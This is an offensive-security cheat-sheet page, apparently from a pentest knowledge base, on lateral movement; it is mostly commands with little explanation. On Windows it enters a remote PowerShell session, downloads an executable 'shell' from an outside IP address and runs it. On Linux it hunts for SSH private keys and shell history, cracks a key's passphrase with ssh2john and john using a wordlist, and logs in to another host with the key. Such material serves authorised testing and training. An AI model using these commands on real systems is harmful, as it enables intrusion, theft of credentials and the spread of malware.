9. Lateral movement

Windows

CanPSRemote

Enter-PSSession -ComputerName m3webaw.m3c.local

Upload shell

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.207:443/CASUAL_PLATFORM.exe', 'C:\Users\Charlene.Butcher\Documents\CASUAL_PLATFORM.exe')"

Execute shell

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ./CASUAL_PLATFORM.exe

Linux

SSH keys

find /home/ -name "id_rsa"

## check if the key is encrypted
cat svuser.key

cat known_hosts

tail .bash_history

If encrypted download the file

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

Decrypt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

ssh -i ./svuser.key svuser@controller

Lateral Movement from Internal Recon

Manual Enumeration

Malleum Knowledge Base

Explorer

9. Lateral movement

Windows

CanPSRemote

Upload shell

Execute shell

Linux

SSH keys

Lateral Movement from Internal Recon

Graph View

Table of Contents